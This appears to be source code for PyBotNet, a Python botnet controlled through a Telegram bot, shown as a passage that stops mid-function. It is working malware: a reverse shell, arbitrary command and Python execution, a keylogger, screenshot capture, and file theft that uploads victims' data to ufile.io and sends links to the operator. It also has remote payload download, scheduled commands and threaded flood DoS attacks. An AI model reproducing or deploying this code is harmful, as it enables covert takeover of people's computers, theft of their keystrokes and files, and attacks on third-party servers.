'''Defult PyBotNet scripts'''

import re
import os
import subprocess
import threading
import random
import socket
import webbrowser

from typing import List
from time import sleep
from uuid import getnode as get_system_mac_addres
from requests import get

from playsound import playsound


# pybotnet import
from . import util
from . import settings

MAC_ADDRES = str(get_system_mac_addres())
keylogger_thread = None
keylogger_util = None
memory = ''
scripts_name = {
    MAC_ADDRES: "`<system MAC_ADDRES> <command>`: run command on one target",

    "help":             "`help`: send this message",

    "do_sleep":         "`do_sleep <scconds> <message>`: print message and sleep",

    "get_info":         "`get_info`: get target info",

    "reverse_shell":    "`<system MAC_ADDRES> reverse_shell`: start reverse shell on target system",

    "export_file":      "`export_file <download link>`: target donwload this file and save to script path",

    "import_file":      "`import_file <file route>`: get a file from target system",

    "screenshot":       "`screenshot`: Takes a screenshot, return the download link",

    "info":             "`info`: run `get_info` command!",

    "cmd":              "`cmd <command>`: run command in target terminal",

    "/start":           "`/start`: run `help` command!",

    "keylogger":        "`keylogger start/stop`: Starts keylogger. use keylogger stop to stop keylogger",

    "schedule":         """`schedule start <second> <shell-command>`: Starts a new schedule for a command.
                        `schedule list`: lists all schedules
                        `schedule stop <schedule name>`: Stops a schedule
                        """,
    "playsound":        "`playsound <soundname>` Plays a sound , MP3 or WAV Files. Sound file should be in the working path.",
    "openurl":          "`openurl <url> <how-many-times>` Will open a specified url n times",
    "dos":              """`dos <attack-type [GETFlood-ACKFlood]> <target-ip> <target-port> <thread-number> <payload-size>` Will run Denial-Of-Service Attack.""",
    "runcode":          "`runcode <code>` Will run given python code. This function cant return values.",
}


def split_command(command: str) -> list:
    '''split string by space'''
    return command.split('\n') if '\n' in command else command.split(' ')


def get_command_name(command: str) -> str:
    '''get first arg'''
    return split_command(command)[0]


def is_command(command) -> bool:
    command_name = get_command_name(command)
    if command_name in scripts_name:
        return True
    return False


def reverse_shell(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger):
    ''' start reverse shell on target system and send response in telegram bot '''

    def send_message(text: str):
        util.send_message_by_third_party_proxy(
            text, TELEGRAM_TOKEN=TELEGRAM_TOKEN,
            ADMIN_CHAT_ID=ADMIN_CHAT_ID, logger=logger)

    logger.info("start reverse shell")
    repeat = 0
    time_out = 500

    while True:
        if repeat > time_out:
            break

        pwd = f"{os.getcwd()}=>"

        message_one = util.get_last_admin_command_by_third_party_proxy(
            ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger)

        if not message_one:
            if repeat == 0:
                send_message(pwd)
            sleep(2)
            repeat += 1
            continue
        else:
            if message_one == "exit":
                out_put = "reverse shell exit."
                send_message(out_put)
                break
            else:
                out_put = execute_cmd(
                    message_one, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger)
            send_message(out_put)
            repeat = 0
    logger.info("reverse shell exit.")
    return "reverse shell exit."


def execute_scripts(command: str, pybotnet_up_time: int, ADMIN_CHAT_ID: str,
                    TELEGRAM_TOKEN: str, previous_update_id: List[int], logger):
    command_name = get_command_name(command)
    try:
        if is_command(command):

            if command_name == MAC_ADDRES:
                '''run command just on this system'''
                logger.info('delete mac addres and run command ')
                new_command = ' '.join(split_command(command)[1:])
                return execute_scripts(
                    new_command, pybotnet_up_time,
                    ADMIN_CHAT_ID, TELEGRAM_TOKEN,
                    previous_update_id, logger)

            elif command_name == 'do_sleep':
                return execute_do_sleep(command, logger)

            elif command_name in ['get_info', 'info']:
                return get_info(pybotnet_up_time, logger)

            elif command_name == 'cmd':
                return execute_cmd(command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, withThread=True)

            elif command_name == 'ls':
                return execute_ls(command, logger)

            elif command_name == 'cd':
                return execute_cd(command, logger)

            elif command_name == 'export_file':
                return execute_download_manager(command, logger)

            elif command_name == 'import_file':
                return execute_upload_manager(command, logger)

            elif command_name == 'screenshot':
                return screenshot(logger)

            elif command_name in ['help', '/start']:
                return command_help(logger)

            elif command_name in ['reverse_shell']:
                return reverse_shell(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger)

            elif command_name == "keylogger" and split_command(command)[1] in ['start', 'stop']:
                return keylogger(logger, command)

            elif command_name == "schedule" and split_command(command)[1] in ["start", "stop", "list"]:
                return scheduler_script(logger, command)

            elif command_name == "playsound":
                return playsound_pybotnet(logger, command)

            elif command_name == "openurl":
                return openurl(logger, command)

            elif command_name == "dos":
                return dos(logger, command)

            elif command_name == "runcode":
                return runcode(logger, command)
        logger.error('execute_scripts invalid command; Wrong format')
        return f"execute_scripts invalid command; Wrong format \n\n scripts name:\n {','.join(scripts_name)}"

    except Exception as error:
        return f'execute_scripts error: {error}'


def execute_do_sleep(command, logger):
    command = split_command(command)
    try:
        sleep_message = command[2:]
        sleep_message = ' '.join(sleep_message)
    except:
        sleep_message = ''

    try:
        do_sleep(seconds=command[1], logger=logger,
                 sleep_message=sleep_message)
        logger.info('do_sleep done')
        return 'do_sleep done'
    except OverflowError as error_name:
        logger.error(f'do_sleep {error_name}')

    except Exception as error:
        logger.error(
            f'execute_do_sleep invalid command; Wrong format, error: {error}')
        return f'execute_do_sleep invalid command; Wrong format, error: {error}'


def do_sleep(seconds, logger, sleep_message: str):
    '''
    print sleep message and sleep
    '''
    if sleep_message != '':
        print(sleep_message)

    logger.info(f'sleep {seconds} second | {sleep_message}')
    sleep(float(seconds))
    logger.info('sleep done')


def get_info(pybotnet_up_time, logger):
    logger.info('return system info')
    return util.get_full_system_info(pybotnet_up_time)


def ls(route: str) -> str:
    try:
        return "\n".join(os.listdir(route))

    except FileNotFoundError as error:
        return f'ls {error}'
    except Exception as error:
        return f'ls Unknown error: {error}'


def execute_ls(command, logger) -> str:
    command = split_command(command)

    logger.info(f'execute ls: {command}')

    try:
        if len(command) >= 2:
            path = command[1]
        else:
            path = '.'
        return ls(path)
    except Exception as error:
        return f'execute_ls error: {error} '


def cd(path: str) -> str:
    try:
        os.chdir(path)
        return f'move to: {os.getcwd()}'

    except FileNotFoundError as error:
        return f'cd {error}'
    except Exception as error:
        return f'cd Unknown error: {error}'


def execute_cd(command, logger) -> str:
    command = split_command(command)

    logger.info(f'execute cd: {command}')
    try:
        if len(command) >= 2:
            path = command[1]
        else:
            path = ' '
        return cd(path)
    except Exception as error:
        return f'execute_ls error: {error} '


def clean_shell_data(output):
    output = str(output).replace('\\r\\n', '\n')  # cleaning data
    output = str(output).replace('\\n', '\n')
    output = str(output).replace("b'", '')
    return output


def cmd(command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, withThread):
    '''Runs cmd commands.'''

    if command[0] == 'ls':
        logger.info('redirect to execute_ls')
        return execute_ls(" ".join(command), logger)

    elif command[0] == 'cd':
        logger.info('redirect to execute_cd')
        return execute_cd(" ".join(command), logger)

    logger.info(f'try to run: {command}')

    if command[0] in ['mkdir', 'touch', 'rm', 'rmdir']:
        os_result = os.system(' '.join(command))
        add_on_message = '''Done !'''

        return f'output code "{os_result}", {add_on_message}'

    else:
        # Everything starts from here.
        if not withThread:
            executecode = util.execute_commands(
                ' '.join(command), ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger)
            result = executecode.runcommand_for_reverse_shell()
            return clean_shell_data(result)

        else:
            executecode = util.execute_commands(
                ' '.join(command), ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger)
            command = threading.Thread(target=executecode.runcommand)
            command.start()
            return "Your command is being executed , you will get the results when it is done."


def execute_cmd(command: str, ADMIN_CHAT_ID: str, TELEGRAM_TOKEN: str, logger, withThread=False) -> str:
    # Removed Is Shell
    # For what is for reverse shell
    try:
        command = split_command(command)
        if command[0] == 'cmd':
            command = command[1:]

    except Exception as error:
        return f'execute_cmd invalid command; Wrong format: {error}'

    try:
        return cmd(
            command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger=logger, withThread=withThread
        )

    except OverflowError as error:
        return f'cmd {error}'
    except Exception as error:
        return f'cmd error: {error}'


def execute_download_manager(command: str, logger):
    '''run download_manager function'''
    command = split_command(command)

    try:
        down_link = command[1]
        file_name = re.findall(r'.*/(.*)$', down_link)
        file_name = (file_name[0])

        logger.info(
            f'execute_download_manager download_link: {down_link}, file name: {file_name}')

        res = download_manager(down_link, file_name)
        if res:
            return f'file download and save; \n\nfrom:\n{down_link} \n\nfile name:\n{file_name} \n\n route:\n{os.getcwd()}'
        return f'download False {down_link}'

    except IndexError as error:
        logger.info(
            f'execute_download_manager wrong format ;need download link for execute_download_manager; error:{error}')
        return f'i need download link for execute_download_manager; error:{error}'

    except Exception as error:
        logger.info(
            f'execute_download_manager; error:{error}')
        return f'execute_download_manager error:{error}'


def download_manager(down_link: str, file_name: str) -> bool:
    '''Download Manager'''
    try:
        req = get(down_link)

        with open(file_name, "wb") as code:
            code.write(req.content)
        return True

    except:
        return False


def execute_upload_manager(command: str, logger):
    '''execute import_file <file route>'''
    command = split_command(command)

    try:
        route = command[1]
        return upload_manager(route, logger)[1]
    except Exception as error:
        logger.error(f'execute_upload_manager: {error}')
        return 'bad format'


def upload_manager(file_route: str, logger):
    '''zip file and upload to up.ufile.io and return link,..'''
    is_true, zip_file_name = util.make_zip_file(file_route, logger)

    if is_true:
        try:
            # open zip file and read binary
            with open(zip_file_name, 'rb') as file:
                binary_file = file.read()
                is_true, download_data = util.upload_server_1(
                    binary_file, zip_file_name, logger)
            try:
                # remove zip file
                os.remove(zip_file_name)
            except Exception as error:
                logger.error('script.upload_manager.remove file error!')

            if is_true:
                # if uploada True
                logger.info(f'{zip_file_name} file uploaded')
                return True, download_data

            return False, 'Upload Failed'

        except Exception as error:
            logger.error(f'upload_manager: {error}')
            return False, 'Upload Failed'
    return False, 'file not found'


def screenshot(logger):
    ''' get screenshot and return screenshot download link '''
    screen_file_route = util.screenshot_pil(logger)

    if screen_file_route:
        try:
            # open png file and read binary
            with open(screen_file_route, 'rb') as file:
                binary_file = file.read()
                is_true, download_data = util.upload_server_1(
                    binary_file, screen_file_route, logger, time_out=120, file_type='png')
            try:
                # remove png file
                os.remove(screen_file_route)
            except Exception as error:
                logger.error(
                    'script.upload_manager.remove  screenshot file error!')

            if is_true:
                # if upload True
                logger.info('screenshot uploaded.')
                return download_data
            else:
                return 'Upload screenshot Failed'
        except Exception as error:
            logger.error(f'scripts.screenshot.upload_manager: {error}')
            return f'Upload Failed: \nupload_manager Exception:{error}'
    else:
        logger.error('script.screenshot in util.screenshot_pil Failed')
        return 'get screenshot Failed'


def keylogger(logger, command):
    global keylogger_util, keylogger_thread
    """checks if command[1] is off or on. if on , a thread to start keylogging will start 
    if off , keylogger thread will stop. this function will handle multiple keyloggers running."""
    keylogger_thread_name = "keylog"  # for threading , this way we can prevent multiple keyloggers running at the same time

    # if user requested keylogger to be turned on
    if split_command(command)[1] == 'start':
        keylogger_util = util.KeyLogger()
        if keylogger_thread_name in (i.name for i in threading.enumerate()):
            logger.error('keylogger is already turned on')
            return 'keylogger is already turned on'
        logger.info('turning keylogger on...')
        keylogger_thread = threading.Thread(
            target=keylogger_util.start, name=keylogger_thread_name)
        keylogger_thread.start()
        keylogger_thread.join()
        logger.info('keylogger turned on.')
        return 'Key logger turned on.'

    # if user requested keylogger to be turned off
    if split_command(command)[1] == 'stop':
        try:
            keylogger_thread.join()
            keylogger_util.stop()
            data = upload_manager("klog.txt", logger)
            if data[0] == False:
                return 'upload failed'
            else:
                logger.info('deleting klog.txt file')
                try:
                    os.remvoe('klog.txt')
                except:
                    logger.error('keylogger file txt deletion failed')
                finally:
                    return 'keylogger off. logger txt file => {0}'.format(data[1])

        except:
            return 'keylogger is already off.'

        else:
            return "Second should be a digit"


def scheduler_script(logger, command):
    splitted_command = split_command(command)

    if splitted_command[1] == "start":
        second = splitted_command[2]
        command = ' '.join(splitted_command[3:])
        scheduler_util = util.ScheduleManagement(int(second),
                                                 command)
        scheduler_util.listOfSchedules[command] = [threading.Thread(target=scheduler_util.startSchedule),
                                                   second]
        # starts threading object
        scheduler_util.listOfSchedules[command][0].start()
        logger.info(
            f"Started Schedule {command} , will run each {second} second")
        return f"Started Schedule {command} , will run each {second} second"

    elif splitted_command[1] == "list":
        listOfSchedules_ToReturn = []
        listOfSchedules = util.ScheduleManagement.listOfSchedules
        for key, value in zip(listOfSchedules.keys(), listOfSchedules.values()):
            listOfSchedules_ToReturn.append(
                f"Command Name = {key} , Will run each {value[1]} second")
        return "\n".join(listOfSchedules_ToReturn)

    elif splitted_command[1] == "stop":
        listOfSchedules = util.ScheduleManagement.listOfSchedules
        command = ' '.join(splitted_command[2:])
        if command in listOfSchedules.keys():
            pass
        else:
            logger.error("Schedule {0} is not available".format(command))
            return "Schedule {0} is not available".format(command)
        logger.info(f"Stopping Schedule {command}")
        threadObject = listOfSchedules[command][0]
        listOfSchedules.pop(command)
        threadObject.join()
        logger.info("Schedule {0} stopped.".format(command))
        return "Schedule {0} stopped.".format(command)


def playsound_pybotnet(logger, command):
    threadObject = threading.Thread(
        target=playsound, args=(split_command(command)[1],))
    threadObject.start()
    sleep(5)
    logger.info("Starting PlaySound...")
    return "Playsound Started."if threadObject.is_alive() else "PlaySound Failed."


def openurl(logger, command):
    url = split_command(command)[1]
    times = split_command(command)[2]
    try:
        logger.info("Opening {0} {1}times".format(url, times))
        for i in range(int(times)+1):
            webbrowser.open(url)

        logger.info("Opened {0} {1} times".format(url, times))
        return "Opened {0} {1} times".format(url, times)
    except:
        logger.error("Error occurred.")
        return "Error occurred."


def dos(logger, command):
    splitted_command = split_command(command)

    dostype = splitted_command[1]
    target = splitted_command[2]
    port = splitted_command[3]
    thread_num = splitted_command[4]
    payload = splitted_command[5]
    if all(var.isdigit for var in [port, thread_num, payload]):
        pass
    else:
        logger.error("Data was not correct.")
        return "Data was not correct."

    try:
        logger.info(f"Checking IP {target} on port {port}")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, int(port)))
        s.close()
    except:
        logger.error(f"IP {target} on port {port} failed.")
        return f"IP {target} on port {port} failed."

    else:
        try:
            payload = random._urandom(
                int(payload)) if dostype.lower() == "ackflood" else 1
        except:
            logger.error("Payload too big. Aborting.")
            return "Payload too big , try smaller payloads."
        else:
            try:
                logger.info("Starting Dos Attack...")
                dos = util.dos(
                    target, int(port), payload, dostype
                )
                for i in range(int(thread_num)):
                    thread = threading.Thread(target=dos.attack)
                    thread.start()
            except:
                logger.error("Something Failed. Maybe The Servers Are Down !")
                return "Something Failed. Maybe The Servers Are Down !"


def runcode(logger, command):
    code = ' '.join(split_command(command)[1:])
    logger.info(f"Trying to run {code}")
    try:
        exec(command)
        return "ِDone"
    except Exception as error:
        logger.error(f"Something failed while trying to run code. {error}")
        return f"Something failed while trying to run code. {error}"


def command_help(logger):
    commands = ''
    try:
        for _, value in scripts_name.items():
            commands += '\n\n|' + value
        logger.info(f'scripts.command_help: return command lists')
        return f'''command list:
{commands}

Version: {settings.pybotnet_version}
more help: {settings.pybotnet_github_link}'''

    except Exception as error:
        logger(f'scripts.command_help: error {error}')
        return f'''
_____________
get command list failed!,
_____________

Pybotnet Version:{settings.pybotnet_version}
for more help, see: {settings.pybotnet_github_link}'''



'''Common utilities'''

# pybotnet modules
from . import settings

# import built-in & third-party modules
import datetime
import socket
import requests
import json
import platform
import time
import zipfile
import os
import random
import subprocess
import schedule

from typing import List
from pynput import keyboard
from socket import gethostname
from uuid import getnode as get_system_mac_addres
from bs4 import BeautifulSoup
from PIL import ImageGrab


class KeyLogger:
    '''this class is for keylogger utility , you should only start this class from a threading object.
    this way , the keylogger and the app itself will both run at the same time.'''

    def __init__(self) -> None:
        self.filename = "klog.txt"

    def pressed_key(self, key):
        """if a key is presses , this function will be called and it will write data."""
        with open(self.filename, 'a', errors='ignore') as logs:
            logs.write('{0} {1}\n'.format(
                str(datetime.datetime.now()), str(key)))

    def start(self):
        """starting point of keylogger."""
        global listener
        listener = keyboard.Listener(on_press=self.pressed_key,)
        listener.start()

    def stop(self):
        """stops listener"""
        global listener
        listener.stop()


class ScheduleManagement:
    listOfSchedules = {}

    def __init__(self, second, command):
        self.second = second
        self.command = command

    def ossystem(self, command):
        os.system(command)

    def startSchedule(self):
        try:
            schedule.every(self.second).seconds.do(self.ossystem, self.command)
            while self.command in self.listOfSchedules.keys():
                schedule.run_pending()
        except:
            self.listOfSchedules.pop(self.command)


class dos:
    def __init__(self, target, port, data, dostype):
        self.target = target
        self.port = port
        self.data = data
        self.dostype = dostype

    def attack(self):
        if self.dostype == "ACKFlood":
            while True:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.target, self.port))
                s.sendto(
                    (self.data), (self.target, self.port)
                )
                s.close()
        else:
            fakeip = f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}'
            while True:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.target, self.port))
                s.sendto(("GET / " + self.target +
                         " HTTP/1.1\r\n").encode('ascii'), (self.target, self.port))
                s.sendto(("Host: " + fakeip + "\r\n\r\n").encode('ascii'),
                         (self.target, self.port))
                s.close()


class execute_commands:
    def __init__(self, command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, timeout=5):
        self.command = command
        self.ADMIN_CHAT_ID = ADMIN_CHAT_ID
        self.TELEGRAM_TOKEN = TELEGRAM_TOKEN
        self.logger = logger
        self.timeout = timeout

    def send_message(self, text: str):
        send_message_by_third_party_proxy(
            text, TELEGRAM_TOKEN=self.TELEGRAM_TOKEN,
            ADMIN_CHAT_ID=self.ADMIN_CHAT_ID, logger=self.logger)

    def clean_shell_data(self, output):
        output = str(output).replace('\\r\\n', '\n')  # cleaning data
        output = str(output).replace('\\n', '\n')
        output = str(output).replace("b'", '')
        return output

    def runcommand(self):
        result = subprocess.check_output(self.command, shell=True)
        self.send_message(f"""RE: {self.command}
        Results: {self.clean_shell_data(result)}""")
        return 0

    def runcommand_for_reverse_shell(self):
        result = subprocess.check_output(self.command, shell=True)
        return result


def get_current_epoc_time() -> float:
    return time.time()


def get_host_name_ip() -> str:
    try:
        host_name = gethostname()
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("4.2.2.4", 80))
        host_ip = s.getsockname()[0]
        return f'{host_ip}\nHostname: {host_name}'
    except:
        return 'Unknown'


def get_my_global_ip() -> str:
    '''return system ip (3 API server)'''

    try:
        return get_my_ip_server_1()

    except:
        try:
            return get_my_ip_server_2()

        except:
            try:
                return get_my_ip_server_3()

            except:
                return 'Unknown'

# Servers to get your public IP


def get_my_ip_server_1():
    '''return global ip V4 and loaction \n
    server 1'''
    takeip = requests.post("https://api.myip.com", timeout=3).text
    ip = str(json.loads(takeip)["ip"])
    country = str(json.loads(takeip)["country"])
    ipaddr = f"{ip}\ncountry: {country}"
    return ipaddr


def get_my_ip_server_2():
    '''return global ip V4 \n
    server 2'''
    return requests.get('https://api.ipify.org', timeout=3).text


def get_my_ip_server_3():
    '''return global ip V4 \n
    server 3'''
    return requests.get('https://ident.me', timeout=3).text


def get_short_system_info() -> str:
    '''system mac addres, ip addres, operating system'''

    short_system_info = f"""------system info------
OS: {platform.system()}
Mac Addres: {get_system_mac_addres()}
Global ip: {get_my_global_ip()}"""

    return short_system_info


def get_full_system_info(pybotnet_uptime=None) -> str:
    f'''return full system info: \n
    get_short_system_info and pybotnet up time, local ip, pybotnet version'''

    full_system_info = f"""{get_short_system_info()}
Up Time: {pybotnet_uptime} Seconds
Local ip: {get_host_name_ip()}
Current Route: {os.getcwd()}
Pid: {os.getpid()}
cpu count: {os.cpu_count()}
Pybotnet Version: {settings.pybotnet_version}
-----------------------"""

    # TODO: system uptime: {None}

    return full_system_info


def make_send_message_api_url(TELEGRAM_TOKEN, ADMIN_CHAT_ID, message) -> str:
    '''
    return api url for send message \n
    return f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/SendMessage?chat_id={ADMIN_CHAT_ID}&text={message}"
    '''
    return f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/SendMessage?chat_id={ADMIN_CHAT_ID}&text={message}"


def post_data_by_third_party_proxy(url, logger, time_out=5):
    '''
    return False or response \n
    Send information using the http debugger site \n
    Only for special situations: \n
    Internet restrictions in some countries
    '''
    payload = {"UrlBox": url,
               "AgentList": "Mozilla Firefox",
               "VersionsList": "HTTP/1.1",
               "MethodList": "POST"
               }

    try:
        response = requests.post(
            url="https://www.httpdebugger.com/Tools/ViewHttpHeaders.aspx",
            data=payload,
            timeout=time_out)

        if response.status_code == 200:
            logger.info(
                'post_data_by_third_party_proxy data sended response: 200')
            return response

        logger.error(
            f'post_data_by_third_party_proxy error: data not sended response: {response.status_code}')
        return False

    except requests.exceptions.Timeout:
        logger.error(f'post_data_by_third_party_proxy error: timeout ')
        return False
    except:
        logger.error(f'post_data_by_third_party_proxy Unknown error')
        return False


def send_message_by_third_party_proxy(message: str, TELEGRAM_TOKEN: str, ADMIN_CHAT_ID: str, logger):
    '''Send messages by api url and third party proxy to adimn'''
    api_url = make_send_message_api_url(
        TELEGRAM_TOKEN, ADMIN_CHAT_ID, message)
    return post_data_by_third_party_proxy(api_url, logger)


def clean_response_third_party_proxy(response, logger):
    '''get http response from third party proxy (http debuger .com) and get telegram data'''
    try:
        response_source = response.text
        response_source = BeautifulSoup(response_source, "html.parser")
        response_source = response_source.find("div", id="ResultData").text
        return response_source.strip()

    except Exception as error:
        logger.info(
            f'clean_response_third_party_proxy: {error}')
        return False


def get_update_by_third_party_proxy(TELEGRAM_TOKEN, logger) -> List[dict]:
    '''Get the latest command sent to the bot in the last 24 hours by third party proxy'''

    get_updates_api_url = f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/Getupdates"

    response = post_data_by_third_party_proxy(
        get_updates_api_url, logger)

    if not response:
        logger.error(
            'get_command_by_third_party_proxy > post_data_by_third_party_proxy return False')
        return False

    try:
        response_source = clean_response_third_party_proxy(
            response, logger=logger)
        if not response_source:
            return False

        if 'The remote server returned an error' in response_source:
            logger.error(
                f'get_update_by_third_party_proxy: [False TOKEN , ADMIN_CHAT_ID or api data] error: {response_source}')
            return False

        response_source = response_source.replace("Response Content", "")
        response_source = response_source.replace("edited_message", "message")
        response_source = json.loads(response_source)['result']
        return response_source
    except:
        logger.error(
            'get_update_by_third_party_proxy error Data extraction failed')
        return False


def get_last_update_id(messages: list, ADMIN_CHAT_ID: str, logger):
    ''' get last admin message and return update_id '''

    if messages == []:
        return False

    for message in messages[::-1]:
        try:
            last_message_chat_id = str(message['message']['chat']['id'])
            update_id = str(message["update_id"])
            if last_message_chat_id == ADMIN_CHAT_ID:
                return update_id
        except:
            continue

    # try to get last update_id and return
    last_message = messages.pop()
    try:
        return str(last_message["update_id"])
    except:
        logger.error(
            'get_last_update_id Failed to extract the latest update_id')
        return False


def set_message_ofset(messages: list, TELEGRAM_TOKEN: str, ADMIN_CHAT_ID: str, logger) -> None:
    '''this founction seen the last message from admin and delete before message'''

    update_id = get_last_update_id(messages, ADMIN_CHAT_ID, logger)

    if update_id:
        api_url = f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/Getupdates?offset={update_id}"

        if post_data_by_third_party_proxy(api_url, logger):
            logger.info(f'Set_message_to_read Message_id: {update_id} DONE')
            return

    logger.error('set_message_ofset Failed')


def extract_last_admin_command(messages: list, ADMIN_CHAT_ID: str, TELEGRAM_TOKEN: str,  logger, previous_update_id=[0]):
    '''extract command in html source 
    this function use for httpdebuger.com: get_update_by_third_party_proxy()'''
    message_text = False

    for message in messages[::-1]:
        try:
            last_message_chat_id = str(message['message']['chat']['id'])
            last_text = message['message']['text']
            update_id = int(message["update_id"])
        except:
            continue

        if last_message_chat_id == ADMIN_CHAT_ID:
            if update_id <= previous_update_id[0]:
                logger.info(
                    f' - previous command from admin: {last_text}, "This command has already been executed"')
                return False

            previous_update_id[0] = update_id
            logger.info(
                f' - new command from admin: {last_text}')
            message_text = last_text
            break

        # Messages from Anonymous
        logger.info(f' -message from {last_message_chat_id}: {last_text}')

    # remove previous commands
    set_message_ofset(messages, TELEGRAM_TOKEN, ADMIN_CHAT_ID, logger)

    return message_text


def get_last_admin_command_by_third_party_proxy(ADMIN_CHAT_ID: str, TELEGRAM_TOKEN: str,
                                                previous_update_id: List[int], logger):
    ''' extract command from  admin or false'''

    messages_list = get_update_by_third_party_proxy(
        TELEGRAM_TOKEN, logger=logger)

    # if message list not False > extract last message from admin > if last admin message not False return
    if messages_list:
        last_message = extract_last_admin_command(
            messages_list, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, previous_update_id)
        if last_message:
            return last_message
    return False


def make_zip_file(route, logger, delete_input_file=False):
    '''get file route, make zip file and save to courent route \n
    return True, new_file_name |or| return False, 'None' \n
    sample: istrue, file_name = make_zip(./test.txt)

    To send a file in Telegram, this file must be zipped
    '''

    # input: /home/onion/text.py ooutput: text.zip
    new_file_name = os.path.splitext(os.path.basename(route))[0]
    new_file_name = f'{new_file_name}.zip'

    if not os.path.isfile(route):
        logger.error('make_zip_file: is not a file')
        return False, 'make_zip_file: is not a file'

    try:
        with zipfile.ZipFile(new_file_name, "w", compression=zipfile.ZIP_DEFLATED) as zf:
            zf.write(route, os.path.basename(route))

        logger.info(
            f'make_zip_file: The file was successfully zipped, file name {new_file_name}')

        if delete_input_file:
            os.remove(route)

        return True, new_file_name

    except Exception as error:
        logger.error(f'make_zip_file: {error}')
        return False, str(error)


def conver_json_to_dict(json_data: json) -> dict:
    '''loads json data and convert to a dict'''
    return json.loads(json_data)


def upload_server_1(file: bytes, file_name: str, logger, time_out: int = 1200, file_type: str = 'zip'):
    # time_out 1200 s == 20 min
    '''api for upload zip file and return download link \n
    this use in commands: import_file, screen_shut, key_loger,.. \n
    its not safe for file transfer!
    api from: up.ufile.io
    size limit 5GB'''
    create_session_link = 'https://up.ufile.io/v1/upload/create_session'
    chunk_link = 'https://up.ufile.io/v1/upload/chunk'  # Send part of the file
    finalise_link = 'https://up.ufile.io/v1/upload/finalise'
    file_size = {'file_size': len(file)}
    files = {'file': file}

    # create session for upload file
    # TODO: add for lop for get a session
    try:
        session = requests.post(create_session_link,
                                data=file_size, timeout=30)
        if session.status_code != 200:
            logger.error(
                f'upload_server_1.create session: status code: {session.status_code}, text: {session.text}')
            return False, 'None'
        # session FUID:
        FUID = conver_json_to_dict(session.text)['fuid']
    except Exception as error:
        logger.error(f'upload_server_1.create session: {error}')
        return False, 'None'

    # upload file
    # TODO: Divide the data into small pieces and upload them
    try:
        chunk_data = {'chunk_index': 1, 'fuid': FUID}
        chunk_res = requests.post(chunk_link, data=chunk_data,
                                  files=files, timeout=time_out)
        if chunk_res.status_code != 200:
            logger.error(
                f'upload_server_1.upload file: status code: {chunk_res.status_code}, text: {chunk_res.text}')
            return False, 'None'
    except Exception as error:
        logger.error(f'upload_server_1.upload file : {error}')
        return False, 'None'

    # close session
    try:
        finalise_headers = {
            'fuid': FUID,
            'file_name': file_name,
            'file_type': file_type,
            'total_chunks': 1
        }

        finalis_res = requests.post(
            finalise_link, data=finalise_headers, timeout=30)
        if finalis_res.status_code != 200:
            logger.error(
                f'upload_server_1.close session , status code: {finalis_res.status_code}, text: {finalis_res.text}')
            return False, 'None'
    except Exception as error:
        logger.error(f'upload_server_1.close session error: {error}')
        return False, 'None'

    # extract download link
    try:
        download_link = conver_json_to_dict(finalis_res.text)
        response = ''
        for key, value in download_link.items():
            response = response + f'\n{key}: {value}'
        return True, response
    except Exception as error:
        logger.error(f'upload_server_1.extract download link error: {error}')
        return False, 'None'


def screenshot_pil(logger, route: str = ''):
    '''get a sreenshot and save to file , return file name or False'''
    try:
        file_name = str(get_current_epoc_time()).replace('.', '_')
        file = open(f'{route}{file_name}.png', 'wb')

        screenshot = ImageGrab.grab()
        # Save the image to the file object as a PNG
        screenshot.save(file, 'PNG')

        file.close()
        return f'{file_name}.png'

    except Exception as error:
        logger.info(f'util.screenshot_pil error: {error}')
        return False



# import pybotnet modules
from . import util
from . import scripts
from . import settings

# import built-in & third-party modules
import logging
import re


class PyBotNet:
    '''
    A module for building botnets with Python and Telegram control panel\n
    '''

    def __init__(
            self,
            TELEGRAM_TOKEN,
            ADMIN_CHAT_ID,
            show_log=False,
            send_system_data=True,
            ignored_previous_command=True
    ):

        self.TELEGRAM_TOKEN = TELEGRAM_TOKEN
        self.ADMIN_CHAT_ID = ADMIN_CHAT_ID
        self.show_log = show_log  # show logs
        self.send_system_data = send_system_data  # send system info in message

        self.previous_update_id = [0]
        self.start_time = util.get_current_epoc_time()
        # just for ofset to last command!

        # logging:
        if self.show_log:
            # show all log's
            self.log_level = logging.INFO
        else:
            # off all log's
            self.log_level = 100
        self.my_logger = logging
        self.my_logger.basicConfig(level=self.log_level)
        self.logger = self.my_logger.getLogger('PyBotNet')

        if ignored_previous_command:
            self.logger.info("The first command is ignored and not executed")
            self.get_last_command_by_third_party_proxy()

    def __str__(self) -> str:
        return settings.pybotnet_info

    def pybotnet_up_time(self) -> int:
        return int(util.get_current_epoc_time() - self.start_time)

    def send_message_by_third_party_proxy(self, message):
        '''Send messages by api url and third party proxy to adimn'''

        if self.send_system_data:
            message = f'{message} \n\n {util.get_short_system_info()}'
        return util.send_message_by_third_party_proxy(message, self.TELEGRAM_TOKEN, self.ADMIN_CHAT_ID, self.logger)

    def get_last_command_by_third_party_proxy(self):
        '''return last admin message or False'''
        # TODO : it is better to dont run this function every time when running.
        return util.get_last_admin_command_by_third_party_proxy(
            self.ADMIN_CHAT_ID, self.TELEGRAM_TOKEN,
            self.previous_update_id, self.logger)

    def get_and_execute_scripts_by_third_party_proxy(self):
        '''
        Automatically takes the command from the telegram
         and checks whether the command is in the list of commands or not \n
        Then run it
        '''
        self.command = self.get_last_command_by_third_party_proxy()
        if self.command:

            if scripts.is_command(self.command):

